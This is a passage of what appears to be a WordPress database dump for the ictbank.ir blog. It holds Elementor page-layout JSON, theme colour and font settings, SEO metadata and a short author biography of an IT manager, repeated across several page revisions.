(3841,777,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":30}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\">With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=primary\"},\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70}},\"elements\":[{\"id\":\"dd31a12\",\"elType\":\"widget\",\"settings\":{\"classic_meta_separator\":\"\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_data\":[\"date\"],\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"cards_columns\":\"1\",\"cards_posts_per_page\":3,\"cards_card_border_radius\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"__globals__\":{\"cards_card_bg_color\":\"globals\\/colors?id=text\",\"classic_box_bg_color\":\"\",\"classic_title_color\":\"globals\\/colors?id=secondary\"},\"classic_columns\":\"1\",\"classic_thumbnail\":\"left\",\"classic_item_ratio\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"classic_image_width\":{\"unit\":\"%\",\"size\":25,\"sizes\":[]},\"classic_meta_data\":[\"date\"],\"classic_column_gap\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]},\"classic_row_gap\":{\"unit\":\"px\",\"size\":23,\"sizes\":[]},\"classic_box_border_radius\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"classic_img_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"classic_box_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"classic_image_spacing\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"classic_title_color\":\"#0074FF\",\"cards_card_bg_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":false},{\"id\":\"bbad01a\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"9301569\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"4fc952c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_Databases01-e1621614447218.jpg\",\"id\":428},\"image_size\":\"full\",\"align\":\"center\",\"caption\":\"Database\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/database\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"},\"_mask_shape\":\"flower\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a6496af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"cd5a844\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_OS01-e1621627479921.jpg\",\"id\":464},\"image_size\":\"full\",\"align\":\"center\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/os\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4f40c24\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"3bc2497\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_Security01-e1621661226935.jpg\",\"id\":515},\"image_size\":\"full\",\"align\":\"center\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/security\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),
(3843,777,'_elementor_pro_version','3.12.3'),
(3844,777,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),
(3846,647,'_yoast_wpseo_content_score','90'),
(3847,647,'_yoast_wpseo_estimated-reading-time-minutes','4'),
(3863,779,'_elementor_edit_mode','builder'),
(3864,779,'_elementor_template_type','kit'),
(3865,779,'_elementor_version','3.12.2'),
(3866,779,'_wp_page_template','default'),
(3867,779,'_elementor_page_settings','a:15:{s:13:\"system_colors\";a:4:{i:0;a:3:{s:3:\"_id\";s:7:\"primary\";s:5:\"title\";s:7:\"Primary\";s:5:\"color\";s:7:\"#4EFF00\";}i:1;a:3:{s:3:\"_id\";s:9:\"secondary\";s:5:\"title\";s:9:\"Secondary\";s:5:\"color\";s:7:\"#0074FF\";}i:2;a:3:{s:3:\"_id\";s:4:\"text\";s:5:\"title\";s:4:\"Text\";s:5:\"color\";s:7:\"#FFFFFF\";}i:3;a:3:{s:3:\"_id\";s:6:\"accent\";s:5:\"title\";s:6:\"Accent\";s:5:\"color\";s:7:\"#61CE70\";}}s:13:\"custom_colors\";a:0:{}s:17:\"system_typography\";a:4:{i:0;a:5:{s:3:\"_id\";s:7:\"primary\";s:5:\"title\";s:7:\"Primary\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Roboto\";s:22:\"typography_font_weight\";s:3:\"600\";}i:1;a:5:{s:3:\"_id\";s:9:\"secondary\";s:5:\"title\";s:9:\"Secondary\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:11:\"Roboto Slab\";s:22:\"typography_font_weight\";s:3:\"400\";}i:2;a:5:{s:3:\"_id\";s:4:\"text\";s:5:\"title\";s:4:\"Text\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Roboto\";s:22:\"typography_font_weight\";s:3:\"400\";}i:3;a:5:{s:3:\"_id\";s:6:\"accent\";s:5:\"title\";s:6:\"Accent\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Roboto\";s:22:\"typography_font_weight\";s:3:\"500\";}}s:17:\"custom_typography\";a:0:{}s:21:\"default_generic_fonts\";s:10:\"Sans-serif\";s:9:\"site_name\";s:10:\"ictbank.ir\";s:26:\"body_background_background\";s:7:\"classic\";s:21:\"body_background_color\";s:7:\"#000000\";s:25:\"mobile_browser_background\";s:7:\"#FF0000\";s:19:\"page_title_selector\";s:14:\"h1.entry-title\";s:11:\"viewport_md\";i:768;s:11:\"viewport_lg\";i:1025;s:27:\"hello_footer_copyright_text\";s:19:\"All rights reserved\";s:15:\"activeItemIndex\";i:1;s:9:\"site_logo\";a:5:{s:3:\"url\";s:63:\"http://ictbank.ir/blog/wp-content/uploads/2020/02/ictbank-1.png\";s:2:\"id\";i:93;s:4:\"size\";s:0:\"\";s:3:\"alt\";s:10:\"ictbank.ir\";s:6:\"source\";s:7:\"library\";}}'),
(3868,779,'_elementor_data','[]'),
(3870,779,'_elementor_pro_version','3.12.3'),
(3875,780,'_elementor_edit_mode','builder'),
(3876,780,'_elementor_template_type','kit'),
(3877,780,'_elementor_version','3.20.4'),
(3878,780,'_wp_page_template','default'),
(3879,780,'_elementor_page_settings','a:17:{s:13:\"system_colors\";a:4:{i:0;a:3:{s:3:\"_id\";s:7:\"primary\";s:5:\"title\";s:7:\"Primary\";s:5:\"color\";s:7:\"#191919\";}i:1;a:3:{s:3:\"_id\";s:9:\"secondary\";s:5:\"title\";s:9:\"Secondary\";s:5:\"color\";s:7:\"#750E21\";}i:2;a:3:{s:3:\"_id\";s:4:\"text\";s:5:\"title\";s:4:\"Text\";s:5:\"color\";s:7:\"#BED754\";}i:3;a:3:{s:3:\"_id\";s:6:\"accent\";s:5:\"title\";s:6:\"Accent\";s:5:\"color\";s:7:\"#E3651D\";}}s:13:\"custom_colors\";a:0:{}s:17:\"system_typography\";a:4:{i:0;a:5:{s:3:\"_id\";s:7:\"primary\";s:5:\"title\";s:7:\"Primary\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Roboto\";s:22:\"typography_font_weight\";s:3:\"600\";}i:1;a:5:{s:3:\"_id\";s:9:\"secondary\";s:5:\"title\";s:9:\"Secondary\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:11:\"Roboto Slab\";s:22:\"typography_font_weight\";s:3:\"400\";}i:2;a:5:{s:3:\"_id\";s:4:\"text\";s:5:\"title\";s:4:\"Text\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Roboto\";s:22:\"typography_font_weight\";s:3:\"400\";}i:3;a:5:{s:3:\"_id\";s:6:\"accent\";s:5:\"title\";s:6:\"Accent\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Roboto\";s:22:\"typography_font_weight\";s:3:\"500\";}}s:17:\"custom_typography\";a:0:{}s:21:\"default_generic_fonts\";s:10:\"Sans-serif\";s:9:\"site_name\";s:10:\"ictbank.ir\";s:26:\"body_background_background\";s:7:\"classic\";s:21:\"body_background_color\";s:7:\"#000000\";s:25:\"mobile_browser_background\";s:7:\"#FF0000\";s:19:\"page_title_selector\";s:14:\"h1.entry-title\";s:11:\"viewport_md\";i:768;s:11:\"viewport_lg\";i:1025;s:27:\"hello_footer_copyright_text\";s:19:\"All rights reserved\";s:15:\"activeItemIndex\";i:1;s:9:\"site_logo\";a:5:{s:3:\"url\";s:63:\"http://ictbank.ir/blog/wp-content/uploads/2020/02/ictbank-1.png\";s:2:\"id\";i:93;s:4:\"size\";s:0:\"\";s:3:\"alt\";s:10:\"ictbank.ir\";s:6:\"source\";s:7:\"library\";}s:36:\"typography_enable_styleguide_preview\";s:3:\"yes\";s:32:\"colors_enable_styleguide_preview\";s:3:\"yes\";}'),
(3880,780,'_elementor_data','[]'),
(3882,780,'_elementor_pro_version','3.13.2'),
(3900,782,'_elementor_edit_mode','builder'),
(3901,782,'_elementor_template_type','wp-page'),
(3902,782,'_elementor_version','3.20.4'),
(3903,782,'_wp_page_template','default'),
(3904,782,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":30}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\">With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=primary\"},\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70}},\"elements\":[{\"id\":\"dd31a12\",\"elType\":\"widget\",\"settings\":{\"classic_meta_separator\":\"\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_data\":[\"date\"],\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"cards_columns\":\"1\",\"cards_posts_per_page\":3,\"cards_card_border_radius\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"__globals__\":{\"cards_card_bg_color\":\"globals\\/colors?id=text\",\"classic_box_bg_color\":\"\",\"classic_title_color\":\"globals\\/colors?id=secondary\"},\"classic_columns\":\"1\",\"classic_thumbnail\":\"left\",\"classic_item_ratio\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"classic_image_width\":{\"unit\":\"%\",\"size\":25,\"sizes\":[]},\"classic_meta_data\":[\"date\"],\"classic_column_gap\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]},\"classic_row_gap\":{\"unit\":\"px\",\"size\":23,\"sizes\":[]},\"classic_box_border_radius\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"classic_img_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"classic_box_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"classic_image_spacing\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"classic_title_color\":\"#0074FF\",\"cards_card_bg_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":false},{\"id\":\"bbad01a\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"9301569\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"4fc952c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_Databases01-e1621614447218.jpg\",\"id\":428},\"image_size\":\"full\",\"align\":\"center\",\"caption\":\"Database\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/database\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"},\"_mask_shape\":\"flower\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a6496af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"cd5a844\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_OS01-e1621627479921.jpg\",\"id\":464},\"image_size\":\"full\",\"align\":\"center\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/os\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4f40c24\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"3bc2497\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_Security01-e1621661226935.jpg\",\"id\":515},\"image_size\":\"full\",\"align\":\"center\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/security\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),
(3906,782,'_elementor_pro_version','3.13.2'),
(3907,782,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),
(3909,783,'_elementor_edit_mode','builder'),
(3910,783,'_elementor_template_type','wp-page'),
(3911,783,'_elementor_version','3.20.4'),
(3912,783,'_wp_page_template','default'),
(3913,783,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":30}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\">With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=primary\"},\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70}},\"elements\":[{\"id\":\"dd31a12\",\"elType\":\"widget\",\"settings\":{\"classic_meta_separator\":\"\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_data\":[\"date\"],\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"cards_columns\":\"1\",\"cards_posts_per_page\":3,\"cards_card_border_radius\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"__globals__\":{\"cards_card_bg_color\":\"globals\\/colors?id=text\",\"classic_box_bg_color\":\"\",\"classic_title_color\":\"globals\\/colors?id=secondary\"},\"classic_columns\":\"1\",\"classic_thumbnail\":\"left\",\"classic_item_ratio\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"classic_image_width\":{\"unit\":\"%\",\"size\":25,\"sizes\":[]},\"classic_meta_data\":[\"date\"],\"classic_column_gap\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]},\"classic_row_gap\":{\"unit\":\"px\",\"size\":23,\"sizes\":[]},\"classic_box_border_radius\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"classic_img_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"classic_box_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"classic_image_spacing\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"classic_title_color\":\"#0074FF\",\"cards_card_bg_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":false},{\"id\":\"bbad01a\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"9301569\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"4fc952c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_Databases01-e1621614447218.jpg\",\"id\":428},\"image_size\":\"full\",\"align\":\"center\",\"caption\":\"Database\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/database\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"},\"_mask_shape\":\"flower\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a6496af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"cd5a844\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_OS01-e1621627479921.jpg\",\"id\":464},\"image_size\":\"full\",\"align\":\"center\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/os\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4f40c24\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center 